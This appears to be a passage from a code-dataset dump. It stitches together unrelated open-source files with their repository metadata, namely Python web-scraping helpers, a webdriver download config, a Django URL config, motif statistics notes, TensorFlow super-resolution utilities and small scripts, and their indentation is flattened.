'\n*More Info:* http://www.imdb.com/title/' + imdbid
else:
omdb_info = '*Title:* ' + title + '\n' + plot + '\n*Rating:*' + imdbrating +\
'\n*More Info:* http://www.imdb.com/title/' + imdbid
return omdb_info
except KeyError:
return None
except IndexError:
return None
else:
return None
# These APIs require the use of Requests, BeautifulSoup, urllib2 and unicodedata.
# As a result of using HTML parsers, the code maybe subject to change over time
# to adapt with the server's pages.
def time_is(location):
"""
Retrieves the time in a location by parsing the time element in the html from Time.is .
:param location: str location of the place you want to find time (works for small towns as well).
:return: time str or None on failure.
"""
if BeautifulSoup:
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-GB,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Referrer': 'http://time.is/',
}
post_url = 'http://time.is/' + str(location)
time_data = web_request.get_request(post_url, header=header)
time_html = time_data['content']
soup = BeautifulSoup(time_html, "html.parser")
time = ''
try:
for hit in soup.findAll(attrs={'id': 'twd'}):
time = hit.contents[0].strip()
except Exception:
pass
return time
else:
return None
def google_time(location):
"""
Retrieves the time in a location using Google.
:param location: str location of the place you want to find time (Location must be a large town/city/country).
:return: time str or None on failure.
"""
if BeautifulSoup is not None:
to_send = location.replace(' ', '%20')
url = 'https://www.google.co.uk/search?q=time%20in%20' + str(to_send)
raw = web_request.get_request(url)
if raw['status_code'] == 200:
raw_content = raw['content']
soup = BeautifulSoup(raw_content, 'html.parser')
raw_info = None
try:
for hit in soup.findAll(attrs={'class': 'vk_c vk_gy vk_sh card-section _MZc'}):
raw_info = hit.contents
except Exception:
pass
if raw_info is None:
return None
else:
return [str(raw_info[1].getText()), str(raw_info[5].getText())]
else:
return None
else:
return None
def top40():
"""
Retrieves the Top40 songs list from www.bbc.co.uk/radio1/chart/singles.
:return: list (nested list) all songs including the song name and artist in the format [[songs name, song artist], etc.]].
"""
if BeautifulSoup is not None:
chart_url = "http://www.bbc.co.uk/radio1/chart/singles"
raw = web_request.get_request(url=chart_url)
html = raw['content']
soup = BeautifulSoup(html, "html.parser")
raw_titles = soup.findAll("div", {"class": "cht-entry-title"})
raw_artists = soup.findAll("div", {"class": "cht-entry-artist"})
all_titles = []
all_artists = []
for x in xrange(len(raw_titles)):
individual_title = unicodedata.normalize('NFKD', raw_titles[x].getText()).encode('ascii', 'ignore')
all_titles.append(individual_title)
for x in xrange(len(raw_artists)):
individual_artist = unicodedata.normalize('NFKD', raw_artists[x].getText()).encode('ascii', 'ignore')
individual_artist = individual_artist.lstrip()
individual_artist = individual_artist.rstrip()
all_artists.append(individual_artist)
songs = []
for x in xrange(len(all_titles)):
songs.append([all_titles[x], all_artists[x]])
if len(songs) > 0:
return songs
else:
return None
else:
return None
tags = ['age', 'alcohol', 'animal', 'attitude', 'beauty', 'black', 'blonde', 'car', 'communication',
'dirty', 'doctor', 'drug', 'family', 'fat', 'fighting', 'flirty', 'food', 'friendship', 'happiness',
'health', 'insults', 'intelligence', 'IT', 'kids', 'life', 'love', 'marriage', 'men', 'mistake', 'money',
'motivational', 'motorcycle', 'new', 'people', 'political', 'puns', 'retirement', 'rude', 'sarcastic',
'sex', 'school', 'sport', 'stupid', 'success', 'time', 'travel', 'women', 'work']
def one_liners(tag=None):
"""
Retrieves a one-liner from http://onelinefun.com/ (by choosing a random category).
:param tag: str a specific tag name from which you want to choose a
joke from.
:return: joke: str a one line joke/statement (depending on category).
"""
if BeautifulSoup is not None:
url = "http://onelinefun.com/"
if tag:
joke_url = url + str(tag) + "/"
else:
global tags
# Select a random tag from the list if one has not been provided
joke_tag = random.randint(0, len(tags) - 1)
joke_url = url + tags[joke_tag] + "/"
raw = web_request.get_request(url=joke_url)
if raw['status_code'] == 200:
html = raw['content']
soup = BeautifulSoup(html, "html.parser")
jokes = soup.findAll("p")
if jokes:
all_jokes = []
for x in xrange(len(jokes)):
individual_joke = unicodedata.normalize('NFKD', jokes[x].getText()).encode('ascii', 'ignore')
all_jokes.append(individual_joke)
if len(all_jokes) is not 0:
del all_jokes[0]
for x in range(6):
del all_jokes[len(all_jokes) - 1]
joke = str(all_jokes[random.randint(0, len(all_jokes) - 1)])
return joke
else:
return None
else:
return None
else:
return None
else:
return None
def etymonline(search):
"""
Searches the etymology of words/phrases using the Etymonline website.
:param search: str the word/phrase you want to search for.
:return: dict the results from the search.
"""
if BeautifulSoup is not None:
url = 'http://etymonline.com/index.php?term=%s&allowed_in_frame=0'
search_parts = search.split(' ')
search_term = '+'.join(search_parts)
post_url = url % search_term
raw = web_request.get_request(url=post_url)
if raw['status_code'] == 200:
html = raw['content']
soup = BeautifulSoup(html, "html.parser")
quotes = soup.findAll("dd", {"class": "highlight"})
# There are several quotes/term results returned, we only want
# the first one, alternatively a loop can be setup.
# Represent the tags as a string, since we do not have specific identification.
# Unicode characters in this process will be represented as their respective values.
quote = quotes[0].getText()
quotes = quote.split('\r\n\r\n')
# There are more than one set of quotes parsed, you may iterate over this too in order to return a
# greater set of results.
return u"" + quotes[0] # Result is returned in unicode.
else:
return None
else:
return None
|
[
"goelmolel@hotmail.com"
] |
goelmolel@hotmail.com
|
8ee5db8601d04ac50e9dad4014de6eb39977675b
|
ea0943075aa088a97c012d5f8a2039eb6c2238ee
|
/webdriver_manager/config.py
|
cd768f7cc0941d8f00c650e5dcb70fc5a85d6e17
|
[
"MIT"
] |
permissive
|
golemhq/webdriver-manager
|
16efde8e8901a7f302251a9d786b9999327e75ab
|
0e72ef1e4c882989fd78cd50b9e46a4503e5fac5
|
refs/heads/master
| 2023-04-06T15:23:15.818404
| 2021-04-13T02:16:49
| 2021-04-13T02:16:49
| 117,376,091
| 5
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 434
|
py
|
ALL_DRIVERS = ['chromedriver', 'geckodriver']
DEFAULT_DRIVERS = ['chromedriver', 'geckodriver']
CHROMEDRIVER_STORAGE_URL = 'https://chromedriver.storage.googleapis.com'
CHROMEDRIVER_LATEST_FILE = 'https://chromedriver.storage.googleapis.com/LATEST_RELEASE'
GECKODRIVER_LASTEST_URL = 'https://api.github.com/repos/mozilla/geckodriver/releases/latest'
GECKODRIVER_URL_BASE = 'https://github.com/mozilla/geckodriver/releases/download'
|
[
"feo.luciano@gmail.com"
] |
feo.luciano@gmail.com
|
c60786012e3320cf0da9a0a1a2d75376c66b34b1
|
f9b90e0c103e0b5297b9ec142341bce24e8e6372
|
/djangoProject/urls.py
|
507edec3e889aaedfed881fae8f2311e6c2891da
|
[] |
no_license
|
VaultBoee/test_rep
|
106b43a0ee7bf99692c3128490a0df6d2721c3bb
|
aa71e9681e05c3daa500c02d1090c9dce2f06fe0
|
refs/heads/main
| 2023-05-15T10:02:53.534653
| 2021-05-29T01:01:23
| 2021-05-29T01:01:23
| 371,848,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 811
|
py
|
"""djangoProject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('test_model/', include('main.urls')),
]
|
[
"vaultboee@gmail.com"
] |
vaultboee@gmail.com
|
a75dcb96bfd05a6f1298857cfa6c5d2702865b08
|
010c50a5fb86a6f2a86f78cafd46641e2cdeb10c
|
/CityMotif/Document/筛选.py
|
947219c3c74c47e64fbda48a2c9996bb8b646438
|
[] |
no_license
|
Qi-Sun/SuzhouProjects
|
d4fca26fa2b0549b9509506cfb6df5690702887e
|
6a88c54d781d2a121d21411a4ba6d3af9ab60124
|
refs/heads/master
| 2020-03-11T13:05:34.185692
| 2018-07-06T04:40:29
| 2018-07-06T04:40:29
| 130,015,060
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,414
|
py
|
--------------3---------------
{'gID': 78, 'freq': 784424.0, 'ave_rand_freq': 821466.94, 'conc': 0.40653, 'ave_rand_conc': 0.42993, 'f-ZScore': -0.16, 'f-pValue': 0.917, 'c-ZScore': -0.43, 'c-pValue': 0.924}
{'gID': 98, 'freq': 1881.0, 'ave_rand_freq': 1657.67, 'conc': 0.00097, 'ave_rand_conc': 0.00092, 'f-ZScore': 0.49, 'f-pValue': 0.047, 'c-ZScore': 0.29, 'c-pValue': 0.066}
--------------3---------------
--------------4---------------
{'gID': 4382, 'freq': 27806873.0, 'ave_rand_freq': 31388613.66, 'conc': 0.16296, 'ave_rand_conc': 0.17586, 'f-ZScore': -0.66, 'f-pValue': 0.971, 'c-ZScore': -0.44, 'c-pValue': 0.974}
{'gID': 4426, 'freq': 136231.0, 'ave_rand_freq': 135636.46, 'conc': 0.0008, 'ave_rand_conc': 0.00077, 'f-ZScore': 0.03, 'f-pValue': 0.816, 'c-ZScore': 0.37, 'c-pValue': 0.057}
{'gID': 4698, 'freq': 5693346.0, 'ave_rand_freq': 7452384.15, 'conc': 0.03336, 'ave_rand_conc': 0.04423, 'f-ZScore': -1.37, 'f-pValue': 0.973, 'c-ZScore': -0.35, 'c-pValue': 0.998}
{'gID': 4740, 'freq': 4508.0, 'ave_rand_freq': 5643.1, 'conc': 3e-05, 'ave_rand_conc': 3e-05, 'f-ZScore': -1.19, 'f-pValue': 0.97, 'c-ZScore': -0.75, 'c-pValue': 0.996}
--------------4---------------
--------------5---------------
{'gID': 1082522, 'freq': 2741562.0, 'ave_rand_freq': 2810030.85, 'conc': 0.00022, 'ave_rand_conc': 0.000217, 'f-ZScore': -0.14, 'f-pValue': 0.96, 'c-ZScore': 0.1, 'c-pValue': 0.24}
{'gID': 1083668, 'freq': 278277.0, 'ave_rand_freq': 358584.97, 'conc': 2.2e-05, 'ave_rand_conc': 2.8e-05, 'f-ZScore': -1.33, 'f-pValue': 0.97, 'c-ZScore': -1.5, 'c-pValue': 1.0}
{'gID': 1083794, 'freq': 1442669.0, 'ave_rand_freq': 1412315.15, 'conc': 0.000116, 'ave_rand_conc': 0.00011, 'f-ZScore': 0.13, 'f-pValue': 0.51, 'c-ZScore': 0.38, 'c-pValue': 0.12}
{'gID': 1090054, 'freq': 8531.0, 'ave_rand_freq': 7054.47, 'conc': 1e-06, 'ave_rand_conc': 1e-06, 'f-ZScore': 1.16, 'f-pValue': 0.05, 'c-ZScore': 2.2, 'c-pValue': 0.03}
{'gID': 1122482, 'freq': 1109927.0, 'ave_rand_freq': 1148057.84, 'conc': 8.9e-05, 'ave_rand_conc': 9e-05, 'f-ZScore': -0.2, 'f-pValue': 0.94, 'c-ZScore': -0.05, 'c-pValue': 0.28}
{'gID': 1122820, 'freq': 11435.0, 'ave_rand_freq': 15702.21, 'conc': 1e-06, 'ave_rand_conc': 1e-06, 'f-ZScore': -1.59, 'f-pValue': 0.97, 'c-ZScore': -1.3, 'c-pValue': 1.0}
--------------5---------------
先以三个节点旅游行为统计得到预设的 z 和 p
z > 0.40653
p < 0.1
两个 p 值 偏差很大时
|
[
"qisun13@pku.edu.cn"
] |
qisun13@pku.edu.cn
|
b719bab964c3d9886777b054c8dfa8c94cf39888
|
448b5ced3ff3a7164731404e517ebddd95a195e8
|
/Resnet_tl/utils2.py
|
fcbd091cf4b461aab94ed40ddd8451e60df77e69
|
[] |
no_license
|
xkinghust/Benchmark_EPS
|
032d512eff5bff0fce81d3e8afee20880b44a060
|
697a44faa6c1c8ee88dfacb8e1723fcd30eba613
|
refs/heads/master
| 2020-07-10T13:47:14.826717
| 2019-06-19T10:00:20
| 2019-06-19T10:00:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,240
|
py
|
# coding=utf8
"""
Deeply-Recursive Convolutional Network for Image Super-Resolution
Paper: http://www.cv-foundation.org/openaccess/content_cvpr_2016/html/Kim_Deeply-Recursive_Convolutional_Network_CVPR_2016_paper.html
Test implementation utility
Author: Jin Yamanaka
"""
from __future__ import division
import datetime
import math
import os
import shutil
from os import listdir
from os.path import isfile, join
import numpy as np
import tensorflow as tf
from PIL import Image
from scipy import misc
# utilities for save / load
test_datasets = {
"set5": ["Set5", 0, 5],
"set14": ["Set14", 0, 14],
"bsd100": ["BSD100_SR", 0, 100],
"urban100": ["Urban100_SR", 0, 100],
"test": ["Set5", 0, 1]
}
class LoadError(Exception):
def __init__(self, message):
self.message = message
def make_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def get_files_in_directory(path):
file_list = [path + f for f in listdir(path) if isfile(join(path, f))]
return file_list
def remove_generic(path, __func__):
try:
__func__(path)
except OSError as error:
print("OS error: {0}".format(error))
def clean_dir(path):
if not os.path.isdir(path):
return
files = os.listdir(path)
for x in files:
full_path = os.path.join(path, x)
if os.path.isfile(full_path):
f = os.remove
remove_generic(full_path, f)
elif os.path.isdir(full_path):
clean_dir(full_path)
f = os.rmdir
remove_generic(full_path, f)
def save_image(filename, image):
if len(image.shape) >= 3 and image.shape[2] == 1:
image = image.reshape(image.shape[0], image.shape[1])
directory = os.path.dirname(filename)
if directory != "" and not os.path.exists(directory):
os.makedirs(directory)
image = misc.toimage(image, cmin=0, cmax=255) # to avoid range rescaling
misc.imsave(filename, image)
print("Saved [%s]" % filename)
def save_image_data(filename, image):
directory = os.path.dirname(filename)
if directory != "" and not os.path.exists(directory):
os.makedirs(directory)
np.save(filename, image)
print("Saved [%s]" % filename)
if len(image.shape) == 3 and image.shape[2] == 1:
image = image.reshape(image.shape[0], image.shape[1])
misc.imsave(filename, image)
def convert_rgb_to_y(image, jpeg_mode=True, max_value=255.0):
if len(image.shape) <= 2 or image.shape[2] == 1:
return image
if jpeg_mode:
xform = np.array([[0.299, 0.587, 0.114]])
y_image = image.dot(xform.T)
else:
xform = np.array([[65.481 / 256.0, 128.553 / 256.0, 24.966 / 256.0]])
y_image = image.dot(xform.T) + (16.0 * max_value / 256.0)
return y_image
def convert_rgb_to_ycbcr(image, jpeg_mode=True, max_value=255):
if len(image.shape) < 2 or image.shape[2] == 1:
return image
if jpeg_mode:
xform = np.array([[0.299, 0.587, 0.114], [-0.169, - 0.331, 0.500], [0.500, - 0.419, - 0.081]])
ycbcr_image = image.dot(xform.T)
ycbcr_image[:, :, [1, 2]] += max_value / 2
else:
xform = np.array(
[[65.481 / 256.0, 128.553 / 256.0, 24.966 / 256.0], [- 37.945 / 256.0, - 74.494 / 256.0, 112.439 / 256.0],
[112.439 / 256.0, - 94.154 / 256.0, - 18.285 / 256.0]])
ycbcr_image = image.dot(xform.T)
ycbcr_image[:, :, 0] += (16.0 * max_value / 256.0)
ycbcr_image[:, :, [1, 2]] += (128.0 * max_value / 256.0)
return ycbcr_image
def convert_y_and_cbcr_to_rgb(y_image, cbcr_image, jpeg_mode=True, max_value=255.0):
if len(y_image.shape) <= 2:
y_image = y_image.reshape[y_image.shape[0], y_image.shape[1], 1]
if len(y_image.shape) == 3 and y_image.shape[2] == 3:
y_image = y_image[:, :, 0:1]
ycbcr_image = np.zeros([y_image.shape[0], y_image.shape[1], 3])
ycbcr_image[:, :, 0] = y_image[:, :, 0]
ycbcr_image[:, :, 1:3] = cbcr_image[:, :, 0:2]
return convert_ycbcr_to_rgb(ycbcr_image, jpeg_mode=jpeg_mode, max_value=max_value)
def convert_ycbcr_to_rgb(ycbcr_image, jpeg_mode=True, max_value=255.0):
rgb_image = np.zeros([ycbcr_image.shape[0], ycbcr_image.shape[1], 3]) # type: np.ndarray
if jpeg_mode:
rgb_image[:, :, [1, 2]] = ycbcr_image[:, :, [1, 2]] - (128.0 * max_value / 256.0)
xform = np.array([[1, 0, 1.402], [1, - 0.344, - 0.714], [1, 1.772, 0]])
rgb_image = rgb_image.dot(xform.T)
else:
rgb_image[:, :, 0] = ycbcr_image[:, :, 0] - (16.0 * max_value / 256.0)
rgb_image[:, :, [1, 2]] = ycbcr_image[:, :, [1, 2]] - (128.0 * max_value / 256.0)
xform = np.array(
[[max_value / 219.0, 0, max_value * 0.701 / 112.0],
[max_value / 219, - max_value * 0.886 * 0.114 / (112 * 0.587), - max_value * 0.701 * 0.299 / (112 * 0.587)],
[max_value / 219.0, max_value * 0.886 / 112.0, 0]])
rgb_image = rgb_image.dot(xform.T)
return rgb_image
def set_image_alignment(image, alignment):
alignment = int(alignment) # I don't like this...
width, height = image.shape[1], image.shape[0]
width = (width // alignment) * alignment
height = (height // alignment) * alignment
if image.shape[1] != width or image.shape[0] != height:
return image[:height, :width, :]
return image
def resize_image_by_bicubic(image, scale):
size = [int(image.shape[0] * scale), int(image.shape[1] * scale)]
image = image.reshape(1, image.shape[0], image.shape[1], image.shape[2])
tf_image = tf.image.resize_bicubic(image, size=size)
image = tf_image.eval()
return image.reshape(image.shape[1], image.shape[2], image.shape[3])
def resize_image_by_pil_bicubic(image, scale):
width, height = image.shape[1], image.shape[0]
new_width = int(width * scale)
new_height = int(height * scale)
if len(image.shape) == 3 and image.shape[2] == 3:
image = Image.fromarray(image, "RGB")
image = image.resize([new_width, new_height], resample=Image.BICUBIC)
image = np.asarray(image)
else:
image = Image.fromarray(image.reshape(height, width))
image = image.resize([new_width, new_height], resample=Image.BICUBIC)
image = np.asarray(image)
image = image.reshape(new_height, new_width, 1)
return image
def load_image(filename, width=0, height=0, channels=0, alignment=0):
if not os.path.isfile(filename):
raise LoadError("File not found")
image = misc.imread(filename)
if len(image.shape) == 2:
image = image.reshape(image.shape[0], image.shape[1], 1)
if (width != 0 and image.shape[1] != width) or (height != 0 and image.shape[0] != height):
raise LoadError("Attributes mismatch")
if channels != 0 and image.shape[2] != channels:
raise LoadError("Attributes mismatch")
if alignment != 0 and ((width % alignment) != 0 or (height % alignment) != 0):
raise LoadError("Attributes mismatch")
print("Loaded [%s]: %d x %d x %d" % (filename, image.shape[1], image.shape[0], image.shape[2]))
return image
def load_image_data(filename, width=0, height=0, channels=0, alignment=0):
if not os.path.isfile(filename + ".npy"):
raise LoadError("File not found")
image = np.load(filename + ".npy")
if (width != 0 and image.shape[1] != width) or (height != 0 and image.shape[0] != height):
raise LoadError("Attributes mismatch")
if channels != 0 and image.shape[2] != channels:
raise LoadError("Attributes mismatch")
if alignment != 0 and ((width % alignment) != 0 or (height % alignment) != 0):
raise LoadError("Attributes mismatch")
print("Cache Loaded [%s]: %d x %d x %d" % (filename, image.shape[1], image.shape[0], image.shape[2]))
return image
def load_input_image(filename, width=0, height=0, channels=1, scale=1, alignment=0,
convert_ycbcr=True, jpeg_mode=False, rescale=True):
image = load_image(filename)
return build_input_image(image, width, height, channels, scale, alignment,
convert_ycbcr, jpeg_mode, rescale)
def build_input_image(image, width=0, height=0, channels=1, scale=1, alignment=0,
convert_ycbcr=True, jpeg_mode=False, rescale=True):
if width != 0 and height != 0:
if image.shape[0] != height or image.shape[1] != width:
x = (image.shape[1] - width) // 2
y = (image.shape[0] - height) // 2
image = image[y: y + height, x: x + width, :]
if alignment > 1:
image = set_image_alignment(image, alignment)
if scale != 1:
image = resize_image_by_pil_bicubic(image, 1.0 / scale)
if rescale:
image = resize_image_by_pil_bicubic(image, scale)
if convert_ycbcr:
image = convert_rgb_to_ycbcr(image, jpeg_mode=jpeg_mode)
if channels == 1 and image.shape[2] > 1:
image = image[:, :, 0:1].copy() # use copy() since after the step we use stride_tricks.as_strided().
return image
def load_input_image_with_cache(cache_dir, org_filename, channels=1, scale=1, alignment=0,
convert_ycbcr=True, jpeg_mode=False, rescale=True):
if cache_dir is None or cache_dir is "":
return load_input_image(org_filename, channels=channels, scale=scale, alignment=alignment,
convert_ycbcr=convert_ycbcr, jpeg_mode=jpeg_mode, rescale=rescale)
filename, extension = os.path.splitext(org_filename)
if filename.startswith("../"):
filename = filename[len("../"):]
if scale != 1.0:
filename += "_%1.0f" % scale
if channels == 1:
filename += "_Y"
cache_filename = cache_dir + "/" + filename + extension
try:
image = load_image(cache_filename, channels=channels)
except LoadError:
image = load_input_image(org_filename, channels=channels, scale=scale, alignment=alignment,
convert_ycbcr=convert_ycbcr, jpeg_mode=jpeg_mode, rescale=rescale)
save_image(cache_filename, image)
return image
def get_split_images(image, window_size, stride=None):
height, width, channels = image.shape
new_height = 1 + (height - window_size) // stride
new_width = 1 + (width - window_size) // stride
windows1=np.zeros((new_height*new_width,window_size,window_size,3),dtype=np.float32)
windows2=np.zeros((new_height*new_width,window_size,window_size,3),dtype=np.float32)
image1=image
image2=np.flip(image,1)
for i in range(new_height):
for j in range(new_width):
windows1[i*new_width+j]=image1[i*stride:i*stride+window_size,j*stride:j*stride+window_size,:]
for i in range(new_height):
for j in range(new_width):
windows2[i*new_width+j]=image2[i*stride:i*stride+window_size,j*stride:j*stride+window_size,:]
total_windows=np.concatenate((windows1, windows2), axis=0)
return total_windows
# utilities for building graphs
def conv2d(x, w, stride, name=""):
return tf.nn.conv2d(x, w, strides=[stride, stride, 1, 1], padding="SAME", name=name + "_conv")
def conv2d_with_bias(x, w, stride, bias, name=""):
conv = conv2d(x, w, stride, name)
return tf.add(conv, bias, name=name + "_add")
def conv2d_with_bias(x, w, stride, bias, add_relu=False, name=""):
conv = conv2d(x, w, stride, name)
if add_relu:
return tf.nn.relu(tf.add(conv, bias, name=name + "_add"), name=name + "_relu")
else:
return tf.add(conv, bias, name=name + "_add")
def dilated_conv2d_with_bias(x, w, stride, bias, add_relu=False, name=""):
conv = tf.nn.atrous_conv2d(x, w, 2, padding="SAME", name=name + "_conv")
if add_relu:
return tf.nn.relu(tf.add(conv, bias, name=name + "_add"), name=name + "_relu")
else:
return tf.add(conv, bias, name=name + "_add")
def xavier_cnn_initializer(shape, uniform=True, name=None):
fan_in = shape[0] * shape[1] * shape[2]
fan_out = shape[0] * shape[1] * shape[3]
n = fan_in + fan_out
if uniform:
init_range = math.sqrt(6.0 / n)
return tf.random_uniform(shape, minval=-init_range, maxval=init_range, name=name)
else:
stddev = math.sqrt(3.0 / n)
return tf.truncated_normal(shape=shape, stddev=stddev, name=name)
def he_initializer(shape, name=None):
n = shape[0] * shape[1] * shape[2]
stddev = math.sqrt(2.0 / n)
return tf.truncated_normal(shape=shape, stddev=stddev, name=name)
def weight(shape, stddev=0.01, name=None, uniform=False, initializer="xavier"):
if initializer == "xavier":
initial = xavier_cnn_initializer(shape, uniform=uniform, name=name)
elif initializer == "he":
initial = he_initializer(shape, name=name)
elif initializer == "uniform":
initial = tf.random_uniform(shape, minval=-2.0 * stddev, maxval=2.0 * stddev)
elif initializer == "stddev":
initial = tf.truncated_normal(shape=shape, stddev=stddev)
elif initializer == "diagonal":
initial = tf.truncated_normal(shape=shape, stddev=stddev)
if len(shape) == 4:
initial = initial.eval()
i = shape[0] // 2
j = shape[1] // 2
for k in range(min(shape[2], shape[3])):
initial[i][j][k][k] = 1.0
else:
initial = tf.zeros(shape)
return tf.Variable(initial, name=name)
def bias(shape, initial_value=0.0, name=None):
if name is None:
initial = tf.constant(initial_value, shape=shape)
else:
initial = tf.constant(initial_value, shape=shape, name=name)
return tf.Variable(initial)
# utilities for logging -----
def add_summaries(scope_name, model_name, var, stddev=True, mean=False, max=False, min=False):
with tf.name_scope(scope_name):
mean_var = tf.reduce_mean(var)
if mean:
tf.summary.scalar("mean/" + model_name, mean_var)
if stddev:
stddev_var = tf.sqrt(tf.reduce_sum(tf.square(var - mean_var)))
tf.summary.scalar("stddev/" + model_name, stddev_var)
if max:
tf.summary.scalar("max/" + model_name, tf.reduce_max(var))
if min:
tf.summary.scalar("min/" + model_name, tf.reduce_min(var))
tf.summary.histogram(model_name, var)
def get_now_date():
d = datetime.datetime.today()
return "%s/%s/%s %s:%s:%s" % (d.year, d.month, d.day, d.hour, d.minute, d.second)
def get_loss_image(image1, image2, scale=1.0, border_size=0):
if len(image1.shape) == 2:
image1 = image1.reshape(image1.shape[0], image1.shape[1], 1)
if len(image2.shape) == 2:
image2 = image2.reshape(image2.shape[0], image2.shape[1], 1)
if image1.shape[0] != image2.shape[0] or image1.shape[1] != image2.shape[1] or image1.shape[2] != image2.shape[2]:
return None
if image1.dtype == np.uint8:
image1 = image1.astype(np.double)
if image2.dtype == np.uint8:
image2 = image2.astype(np.double)
loss_image = np.multiply(np.square(np.subtract(image1, image2)), scale)
loss_image = np.minimum(loss_image, 255.0)
loss_image = loss_image[border_size:-border_size, border_size:-border_size, :]
return loss_image
def compute_mse(image1, image2, border_size=0):
if len(image1.shape) == 2:
image1 = image1.reshape(image1.shape[0], image1.shape[1], 1)
if len(image2.shape) == 2:
image2 = image2.reshape(image2.shape[0], image2.shape[1], 1)
if image1.shape[0] != image2.shape[0] or image1.shape[1] != image2.shape[1] or image1.shape[2] != image2.shape[2]:
return None
if image1.dtype == np.uint8:
image1 = image1.astype(np.double)
if image2.dtype == np.uint8:
image2 = image2.astype(np.double)
mse = 0.0
for i in range(border_size, image1.shape[0] - border_size):
for j in range(border_size, image1.shape[1] - border_size):
for k in range(image1.shape[2]):
error = image1[i, j, k] - image2[i, j, k]
mse += error * error
return mse / ((image1.shape[0] - 2 * border_size) * (image1.shape[1] - 2 * border_size) * image1.shape[2])
def print_CNN_weight(tensor):
print("Tensor[%s] shape=%s" % (tensor.name, str(tensor.get_shape())))
weight = tensor.eval()
for i in range(weight.shape[3]):
values = ""
for x in range(weight.shape[0]):
for y in range(weight.shape[1]):
for c in range(weight.shape[2]):
values += "%2.3f " % weight[y][x][c][i]
print(values)
print("\n")
def print_CNN_bias(tensor):
print("Tensor[%s] shape=%s" % (tensor.name, str(tensor.get_shape())))
bias = tensor.eval()
values = ""
for i in range(bias.shape[0]):
values += "%2.3f " % bias[i]
print(values + "\n")
def get_test_filenames(data_folder, dataset, scale):
test_folder = data_folder + "/" + test_datasets[dataset][0] + "/image_SRF_%d/" % scale
test_filenames = []
for i in range(test_datasets[dataset][1], test_datasets[dataset][2]):
test_filenames.append(test_folder + "img_%03d_SRF_%d_HR.png" % (i + 1, scale))
return test_filenames
def build_test_filenames(data_folder, dataset, scale):
test_filenames = []
if dataset == "all":
for test_dataset in test_datasets:
test_filenames += get_test_filenames(data_folder, test_dataset, scale)
else:
test_filenames += get_test_filenames(data_folder, dataset, scale)
return test_filenames
def get_psnr(mse, max_value=255.0):
if mse is None or mse == float('Inf') or mse == 0:
psnr = 0
else:
psnr = 20 * math.log(max_value / math.sqrt(mse), 10)
return psnr
def print_num_of_total_parameters():
total_parameters = 0
parameters_string = ""
for variable in tf.trainable_variables():
shape = variable.get_shape()
variable_parameters = 1
for dim in shape:
variable_parameters *= dim.value
total_parameters += variable_parameters
parameters_string += ("%s-%d, " % (str(shape), variable_parameters))
print(parameters_string)
print("Total %d variables, %s params" % (len(tf.trainable_variables()), "{:,}".format(total_parameters)))
# utility for extracting target files from datasets
def main():
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_string("org_data_folder", "org_data", "Folder for original datasets")
flags.DEFINE_string("test_set", "all", "Test dataset. set5, set14, bsd100, urban100 or all are available")
flags.DEFINE_integer("scale", 2, "Scale for Super Resolution (can be 2 or 4)")
test_filenames = build_test_filenames(FLAGS.org_data_folder, FLAGS.test_set, FLAGS.scale)
for filename in test_filenames:
target_filename = "data/" + filename
print("[%s] > [%s]" % (filename, target_filename))
if not os.path.exists(os.path.dirname(target_filename)):
os.makedirs(os.path.dirname(target_filename))
shutil.copy(filename, target_filename)
print("OK.")
if __name__ == '__main__':
main()
|
[
"flying10101@gmail.com"
] |
flying10101@gmail.com
|
cfb1c009a31a672021f21e0d7b268494c5275f1c
|
3649895cf37988d260e409d3eb01023182619d6a
|
/findInLineWord.py
|
02a0cc1cdf49ffd742523c223c3465f5db8f6c26
|
[] |
no_license
|
guneetbrar/pyPractice
|
bb7b9720739e76e5348dbcf43e0188854121b82d
|
255dc7f5a0ba57404fc9da16f86513ed8451d4f1
|
refs/heads/main
| 2023-01-13T18:37:20.687813
| 2020-11-17T15:36:53
| 2020-11-17T15:36:53
| 301,205,506
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 134
|
py
|
fhand = open('test.txt')
for line in fhand:
line = line.rstrip()
if not '@gmail.com' in line:
continue
print(line)
|
[
"guneetsb25@gmail.com"
] |
guneetsb25@gmail.com
|
dd81a794303ed6d00e9d6a631b8f341e69601a53
|
586bd1e20882fc779f1352eab629ff78aa3c9fa2
|
/sendgrid_backend/version.py
|
bb200152c96c51b2e3037463c6bfbfae581d9433
|
[
"MIT"
] |
permissive
|
mr-napik/django-sendgrid-v5
|
58ad930c0d1bc8e9cde5d1b9e70fc57b560b6aa0
|
7b1e162347d49d1d4c72f4a891d5239adfc8a0ea
|
refs/heads/master
| 2021-05-02T13:04:06.811933
| 2018-02-08T17:01:42
| 2018-02-08T17:01:42
| 120,752,536
| 0
| 0
| null | 2018-02-08T11:24:42
| 2018-02-08T11:24:42
| null |
UTF-8
|
Python
| false
| false
| 23
|
py
|
__version__ = "0.6.86"
|
[
"steve@predata.com"
] |
steve@predata.com
|
916dc949f6c1d7d4b3f95ec28302bd150df14b7b
|
c5abc087ace887df784be3ab7012c94a6e533d9f
|
/test/testClass.py
|
315f79915b502591bb7cf4d608661e2f5c3934ec
|
[] |
no_license
|
ifhuang/azure-formation
|
bc0ec1926a6397f61c498450c6a202a595f09365
|
4db704a80c65e3e4e7d0ff18d64bfa04e7cfd407
|
refs/heads/master
| 2021-01-18T21:37:08.968600
| 2015-06-24T06:37:55
| 2015-06-24T06:37:55
